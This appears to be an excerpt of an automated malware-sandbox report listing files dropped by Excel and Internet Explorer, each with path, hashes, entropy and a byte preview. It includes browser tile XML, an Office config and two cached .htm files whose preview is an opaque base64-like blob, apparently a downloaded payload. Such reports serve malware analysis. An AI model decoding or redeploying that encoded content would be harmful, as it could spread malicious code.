C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28148
Entropy (8bit):	1.9172894757577383
Encrypted:	false
SSDEEP:	192:rCZdQV6PkVjB2JWVaMlFepzz6cd1eOpzz6kA:r+iAMxw45TOrHJS
MD5:	ED54374423511A130B6C7F70E51634B8
SHA1:	2744C26F931D20C425AA2CDA96362DB72C2D8EE4
SHA-256:	4293409833513E385CCD6D9E7BC421C645062643EFB9ED25E6C4D1D18E1472FA
SHA-512:	76639BE112CC0C0E55C7763F137883227D129DB3631901B88A8DAB75DD958FDBDD5D000FDDA50A406B655C5B6D6118CDD39B599AE851D0DF888F027DCBF5C2B0
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28148
Entropy (8bit):	1.9207864501007292
Encrypted:	false
SSDEEP:	96:rUZ7Qr6jBSDjZ2EW5MBFrdTY5dd1r/dTY5lA:rUZ7Qr6jkDjZ2EW5MBFNMdd1VMlA
MD5:	A3A2174E4BEEBF9ACEE6A917DFE58C7C
SHA1:	33FFE8E193DF001EF984C47A144148A31DCED4CF
SHA-256:	6DA57020DEAE2361A87E28B29714047D5ED384E468F9E682D11F81A986B47ECF
SHA-512:	68E0DAF1E5093E96248B1B570ADB9A8460B3B7CE2C4CB872127FA7212AA04850D54C959FB756C98EC807E07C4B6D875A05C77887E5414FD09209A3F3B962BD25
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28156
Entropy (8bit):	1.9208052079408886
Encrypted:	false
SSDEEP:	192:riZtQh6DkejR2WWcMIdiUmCIiJuliUmeUmCIiJNA:rey8IYANZE3Oi830Oic
MD5:	0B513216BE62CF04377BFB78AF2FB033
SHA1:	7DDC0EFE169655A8E42042F16B358E4640501542
SHA-256:	901141D666CB5B0447B943A481610CC7D569368363784115138EB19808071358
SHA-512:	BAB081FBC6FBADCF929D9C25872DCA16BC7988D03CC0CA9224C0D95CE3D2198EF4281BC9451CCA33AF1F4D4F0D6FA13AA8717317F7DC8E7578687F9958A0EF66
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9196947220972707
Encrypted:	false
SSDEEP:	96:riZyQW6wBSrjF2dWWMCZ59Fut1S1599x9Fut0A:riZyQW6wkrjF2dWWMCZ5Wy15pWSA
MD5:	7E9E57AAF045A952E0B0559FCAF26878
SHA1:	2C0449F865C5EFD6124F87884CECBC5B03B0AB3C
SHA-256:	63F65CED138E3DC528136010881E304108EDAA83A9D1AC22796ED9EA9E371054
SHA-512:	0858D0B9638B8FBC0B712E76DA0FC7C25D18F4703F76B1C59963A128F81A736C7749F975DD74C0B08E7E23D19B7DF3A7E8363946C8E6C37AA783CEF3DC64D211
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAAA-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28148
Entropy (8bit):	1.9192988666458124
Encrypted:	false
SSDEEP:	96:r3ZgQE6OBSxjt2pWqMSFnXN2l9S5d1n9XN2l9SXA:r3ZgQE6Okxjt2pWqMSFXUy5d1FUyXA
MD5:	D522B3AA351CCC731B023D0868FCD450
SHA1:	D58CD2A468F6636DA0735500188A8DC7A31DF65C
SHA-256:	585B9E3F9E541EDB499CAC51579AE518A7D8A8620EAD2EAF1EFBB3B410E11C52
SHA-512:	FA8A43DC85369E24CC4C7691A4F6BD5C48CD9462A61304DEC391223BB18DD80063ABA4C28667D542A6612560647B8A6B8365EB80E606652399665EBECA6FD92B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28172
Entropy (8bit):	1.925227833078679
Encrypted:	false
SSDEEP:	192:rUZTQb6Vk/jh2dWdM1tF12AHTTNk6tTlF12AHR12AHTTNk6tuA:rEcee7Q0u7n2AHnNbtZn2AHj2AHnNbtJ
MD5:	EA707C8E29A33783E7714DDA936A6482
SHA1:	6C033200001FEF5CE739C230A8B4F0D35272EC5A
SHA-256:	7BAB32166C9B720E975784A0D20D29E7A283710166AFA9BA6AAB2A2D6F1CD6C2
SHA-512:	C63B113B2C98E82D1533907B3E8806BF7152E81FDD6A3BC47E6DE8E4B17ABE93F2EE8737FF0F7C239B928B97811FBD4FB5521560711F66BB6CB5C163C698B5B2
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.146197797552912
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEiHP9HPAnWimI002EtM3MHdNMNxOEiHP9HPAnWimI00ObVbkEtMb:2d6NxOLPRPASZHKd6NxOLPRPASZ76b
MD5:	F76485029FC4D51ED000A71E2D921677
SHA1:	AB5DE9BC6DC6687110ACE30E45E78A7D6B5B2C14
SHA-256:	06CE8BBA607FC68C3387149257A9D9EA7BF5DCAD102F1832A7855F18BA8EF7BB
SHA-512:	49E65EC5F1317F7E5846EFC139EA850E47D493ED5FB37A188EE5C8F0A842B537092A3352B127B5B4C4AA71E7C242649B299408F41CD08D6674F864173E953C86
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.152356522543803
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kBHPmHPAnWimI002EtM3MHdNMNxe2kBHPmHPAnWimI00Obkak6EtMb:2d6NxrOPsPASZHKd6NxrOPsPASZ7Aa7b
MD5:	F432DD266A0B5AA4C4205FA62766D1DC
SHA1:	D52025B91E0616A99C1D89BE069BD4AB5B552F72
SHA-256:	E5BB1A8751CAE9776C9E3DDC37AAF3BD1F8108D34459A4E27FAC794D1069931F
SHA-512:	CBA479714BDBD445DC77FB1DE97E16FFF5B5A82D166469AB07F0A29EB0ED036695108AE592FE13AC7D51DA7ACFDD603DAC46207815E3E56AFA619EB7172D233A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.165732408111604
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLiHP9HPAnWimI002EtM3MHdNMNxvLiHP9HPAnWimI00ObmZEtMb:2d6NxvkPRPASZHKd6NxvkPRPASZ7mb
MD5:	7F83B8E29E376568823D4452E4DF32DE
SHA1:	11B0F37B6192D02724341CE10AD5EB489ED8F9C9
SHA-256:	B5ADA2D7D5D7A468A62E659662E10C36876338BAAD0E7202B4569C57E61D2050
SHA-512:	5421CDBD73433F3BFEC690259C8CE001DFCDEFF889921F7EBC61A2EA1DE559349F44945797D5B189B156E1669FBC7B74F8488EC2B1CE48934C4C22FBC43B8DAE
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.1626781975834435
Encrypted:	false
SSDEEP:	12:TMHdNMNxiiHP9HPAnWimI002EtM3MHdNMNxiiHP9HPAnWimI00Obd5EtMb:2d6NxlPRPASZHKd6NxlPRPASZ7Jjb
MD5:	74D4581F7014B22CC25A8028824D5535
SHA1:	553BF507C0D4DA936063C99BF1A77E03A7D088DB
SHA-256:	A635AD60F47FC9E1F5DFCCC476008D99047B8C5B60B6CD1C5DBF4FD795E3BED6
SHA-512:	675BCB45EAE4B7A40D51B90EB9B0D69E13737897BAB070988C4AF59D62914EA53C1B295FB3A2C611A6A5256A91C038B95B6858544A0226F1314AB1AABD2749D6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1772982971017845
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwiHP9HPAnWimI002EtM3MHdNMNxhGwiHP9HPAnWimI00Ob8K075Ety:2d6NxQ/PRPASZHKd6NxQ/PRPASZ7YKa/
MD5:	ACA8AE0B58705E0C5084DEBF232D41D8
SHA1:	816C94356880740F9A42D7153FDAA0171278F0B7
SHA-256:	D5A756E2B28349FD5AFB3D71B6F9A718D4206BB4A1A0C8E87528798AEF579A33
SHA-512:	A92B7176118B0C3C4B15AB6740FE2D86041345343C6F41EC5AA9A4983ABF6768E7116A122D6ADE5DE4985D9A1D503AB38C4243027702890049D9A623FAAC0644
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.149606845977576
Encrypted:	false
SSDEEP:	12:TMHdNMNx0niHP9HPAnWimI002EtM3MHdNMNx0niHP9HPAnWimI00ObxEtMb:2d6Nx0IPRPASZHKd6Nx0IPRPASZ7nb
MD5:	68E59FC6C72262D7F1CF539CAB32FEA9
SHA1:	9D8C50D3263CC4DADF40A67D1C3286FB72826915
SHA-256:	281B190131D55C2CE519EE5A3E600B77BD623A2BE37D1C5040649A691F9E6883
SHA-512:	BDFC78821D308AA9C510F66B89CFCFA93EE43DB50494E2F1ABBBD8000400AA1B5AEF6B839217BA58D182D679CB54AB2C3E39C1E2B5BD2DFD7EF34D7AC9F2A312
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.186621498823608
Encrypted:	false
SSDEEP:	12:TMHdNMNxxiHP9HPAnWimI002EtM3MHdNMNxxiHP9HPAnWimI00Ob6Kq5EtMb:2d6NxWPRPASZHKd6NxWPRPASZ7ob
MD5:	C7F876206360C67ED70EB3F2D2685C7C
SHA1:	3E7E92C708D3E9A5B639595C1F287BF94B7F0A26
SHA-256:	7A34373A33707952AFBE0C34F34CC45D1EEAA1EDC3F33FE0EF714DC7037C06B5
SHA-512:	4CC339188CFDD3B0519EA18F4E6CB952D11E06967DA5F77C12C512A3BD785DDF4845DB368FF3C0AFC54C47575FCCD2277BA2B58D9391A96388EA75C10C86D310
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x35752726,0x01d7744b</date><accdate>0x35752726,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.14702830312792
Encrypted:	false
SSDEEP:	12:TMHdNMNxcBHPmHPAnWimI002EtM3MHdNMNxcBHPmHPAnWimI00ObVEtMb:2d6Nx2PsPASZHKd6Nx2PsPASZ7Db
MD5:	3517B303BFEC51E792DBC9D12EF620E5
SHA1:	C46BC32F66B232E5208B50264C298EF17478DDE3
SHA-256:	9B832359F5608F5D52DC779FF99AE85B96EBF31E74B5AE65C3F2357CB7FBB06C
SHA-512:	ABF36994017705CFAB791889639CE3B18715CDBC6D5BB8AFA11890D0E9FC1A15B568BC088BDF29063906887CB5ADDCA6E499D9167E92C42EE670227D1EC102A3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.130796255197012
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnBHPmHPAnWimI002EtM3MHdNMNxfnBHPmHPAnWimI00Obe5EtMb:2d6NxdPsPASZHKd6NxdPsPASZ7ijb
MD5:	2A87457A6C3F87D17C645908B4BF37D2
SHA1:	467BBFFA27D6FFF3616C0A5745A9248EE096527C
SHA-256:	5D284F4DAD6737C1700C6545859514C0E7BF46EEA48126F134E27729B5C1F683
SHA-512:	B06E7CF276108CC9EA32252F62D684C69E12859093E42AD4CF2F813CD87302CAD603B79958202988B05E7435B7DC3D1A27AAA8032FE92C1439C3B26D10F003FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x356d8606,0x01d7744b</date><accdate>0x356d8606,0x01d7744b</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\3A4E1985-998D-4759-B374-77BB71813A62 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	135209
Entropy (8bit):	5.363079740300261
Encrypted:	false
SSDEEP:	1536:ecQIKNgeBTA3gBwlpQ9DQW+zoY34ZliKWXboOidX5E6LWME9:4EQ9DQW+zwXO1
MD5:	3841AC8D65B710A3695EC5D39A02F2E2
SHA1:	2A507453669FA7692D8C2F2B867900D9FE776B94
SHA-256:	1D3689B9C732037A759788EE407DCA86ACFA8853F37D7BDEFE5A0B4E46231C50
SHA-512:	BDE5E8EC071C24E777D9E33FEDC480D1A590FAAAD867FFE13871A59C0DE17821E4AA0CAD469EDA666CF0F1B5527B10A2FA9A323CEAB59F16FE2BB343C418EC35
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-07-08T13:45:10">.. Build: 16.0.14306.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E633A7EE.jpg Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1684x1191, frames 3
Category:	dropped
Size (bytes):	182763
Entropy (8bit):	7.976853204439468
Encrypted:	false
SSDEEP:	3072:Sp1+wnp/jn5IKWPOKmK+BLPnYdP9ImTR35MM+mEGJ0fPjiw2/1MX92lCn5yx5bw:41+wnpxKSBzKdpGmEzn2OXEUuw
MD5:	B0F3E5C5562C746FC4EEBA4CFFAE36CE
SHA1:	7C65093408165AE6672EF63DA46A04C60491DFE6
SHA-256:	C5B922DFDDE5759B37558050C48BC9053E6698B463F5D3A39865E23445AFCBC8
SHA-512:	43AE436E227ED182C273979A3E10CAF403B12479D800D7BA410B754D83CF884FCED4CEFEAA2158B4633C37F934FD270A4F757E6B083AC0F836DCF83F2DCA77D6
Malicious:	false
Preview:	......JFIF................................................................"..."%%424DD\.................................................."..."%%424DD\..........."................................................."T..d.T.U..i+...{l..f...+...ji....@..m....loe.LjK..r..K^...f.$.........Lmn%Qd.-T#..).E.5..u.UT....V:.}.s..qcL,{. ..@........X.m...+"..q..1.P........s3.....cW7g..;#.~^CK..H.XL.].Q...N.>.5p....J......6.}....."QV:...s.R.3....X..`....!....vy...XZ........&@.`/........g#37..F...p &H$y.Z.....Z.......J)VkJ...z..o.....y.....!..E.H.]b=..DH0.I .....;.....S...EI..(L.........s.i.\NNf^].-v..7Z0.0.2.0........SBC...R;.+M..V..}...U...SMT!}..3-j..D.......$ ....@...U.h....DP.X.&Be.../73'&..EY..........P`.............+.,.......(.....n.....R..Uk...b&B!.=(..,..2(................."..f.........I....w.Vk..v...`.f.J.0.0...R..\..za..).....VY.@D..`{miy).b&}... ...LD...L.. .......a..&]...5.f^vm..........1....)......f.Zh...a .T....Tc..e.Q.E0\.[e.C....2.$.k..QL.G...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FCD9B161.jpg Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1684x1191, frames 3
Category:	dropped
Size (bytes):	182763
Entropy (8bit):	7.976853204439468
Encrypted:	false
SSDEEP:	3072:Sp1+wnp/jn5IKWPOKmK+BLPnYdP9ImTR35MM+mEGJ0fPjiw2/1MX92lCn5yx5bw:41+wnpxKSBzKdpGmEzn2OXEUuw
MD5:	B0F3E5C5562C746FC4EEBA4CFFAE36CE
SHA1:	7C65093408165AE6672EF63DA46A04C60491DFE6
SHA-256:	C5B922DFDDE5759B37558050C48BC9053E6698B463F5D3A39865E23445AFCBC8
SHA-512:	43AE436E227ED182C273979A3E10CAF403B12479D800D7BA410B754D83CF884FCED4CEFEAA2158B4633C37F934FD270A4F757E6B083AC0F836DCF83F2DCA77D6
Malicious:	false
Preview:	......JFIF................................................................"..."%%424DD\.................................................."..."%%424DD\..........."................................................."T..d.T.U..i+...{l..f...+...ji....@..m....loe.LjK..r..K^...f.$.........Lmn%Qd.-T#..).E.5..u.UT....V:.}.s..qcL,{. ..@........X.m...+"..q..1.P........s3.....cW7g..;#.~^CK..H.XL.].Q...N.>.5p....J......6.}....."QV:...s.R.3....X..`....!....vy...XZ........&@.`/........g#37..F...p &H$y.Z.....Z.......J)VkJ...z..o.....y.....!..E.H.]b=..DH0.I .....;.....S...EI..(L.........s.i.\NNf^].-v..7Z0.0.2.0........SBC...R;.+M..V..}...U...SMT!}..3-j..D.......$ ....@...U.h....DP.X.&Be.../73'&..EY..........P`.............+.,.......(.....n.....R..Uk...b&B!.=(..,..2(................."..f.........I....w.Vk..v...`.f.J.0.0...R..\..za..).....VY.@D..`{miy).b&}... ...LD...L.. .......a..&]...5.f^vm..........1....)......f.Zh...a .T....Tc..e.Q.E0\.[e.C....2.$.k..QL.G...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\o596c7z[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	258256
Entropy (8bit):	5.999933884008133
Encrypted:	false
SSDEEP:	6144:+/l4ukVJZe85j6DyuC15gLFoQzGyfLPqW0j61kafk2sfkWzUheG0qE:+/lMfWCQGIOWvZBCkWgheGbE
MD5:	551D610AB28E2FA1D45F38FB17F165BB
SHA1:	CD94C081766B277A08DBDE62EA34B0E8EB73BA67
SHA-256:	150199FDE5CEF83225A5981568F73C2F9FA36E7D5D98C25A05FACCBC76D8E96C
SHA-512:	549D95DF5A43DD9CD9EA83D1FF40845215EB0CE69DC6C8E9B57221F3A8E7AFB41DCD43015016CBBF93B045E93BBB556A9F829992B0B1D7B375564952AB99AE1E
Malicious:	false
Preview:	AfdhH03IPvwpNbGUGQC3Sqo5nftVA9XNPzyOWIcbsqrtOYvIUZRP7OGoFvFbiojuaJshkPO9FgvlyWlUP4POkfsItsSdZ7MaI6aLX1F9mn0b72bpQLo1HjAAtwbQRB/7+TPhn2IVyA8On0We0655t+EPN78Bk/n78C6gsJXFqa+We0Ah/aKMl6xIxi6gEqXYyc7eMj2JlHjS2kHMLbc+n+hphZp+jGMg/TrkUqtZVCliq4owM71KsPfJq/R3ZHFnXecbMs4fW874IsPVTPBP6M+fquW72jimRji++xg7y59cq7j+2CWwoK7ncwwKl1LdR58jZFEZbD+bFrCctM+66Hu+K4GySCtWXrrLWZxDeWJtDldoF8/ldye6gCITZxtVcGDXmxX3FWhQ08HffwJl8AUSUMKNZrOjdSWOIU166fOcsq/iIXaZPPJ1iKiCYPc9ZfkPav/T5o4ZsHxrqVIKNqAhTOVcvsbVXAmVvLdTSRncHXOI7rI/mdGcsztfwIH567L7lXyRsvCSUyH+Zh5ym50wA8rFUFKyMJRhk2MlhS7R7fKCKIN9RLK/4qITqxRxhWUPfTiUKHQuxAT/BrXz8to2ig37LRZCQEPrz3VgpJXsvfFWOT/OM3KZUDKXbdHglEyHpg31qySzKLswxls3OQ6kBlfkd44a8sIHeCtXrWHmvdfiQtejcISo1AONzeEp3yyau5RKUqe/jX1JPNm9xz4bYjRuIKtz4vWJ0gjN0SXeOD5sD4C+jt7grroCuBOwB9/rdYwd+dpZ0QwO23TRlCDS1dQpQX6uesvdZol3fcHJBDNdAWHSGs5RhlTED5IMIftppJG6prcqTEpoYJsdzOReFRwruUISdsKcDUG2uwzqGLTPBeETf1CL3ln3CGgMRVTk4nDZXvutjofVVRnZn0X0Tsj3wrsuJm4EJdL6A4on23uuWHmuyxVdZlxi5EG9zDzU/jf7nFuEAq29Hl9x0gla362WFYAcsD/bs/NE

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\M8anWcq[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	258256
Entropy (8bit):	5.999933884008133
Encrypted:	false
SSDEEP:	6144:+/l4ukVJZe85j6DyuC15gLFoQzGyfLPqW0j61kafk2sfkWzUheG0qE:+/lMfWCQGIOWvZBCkWgheGbE
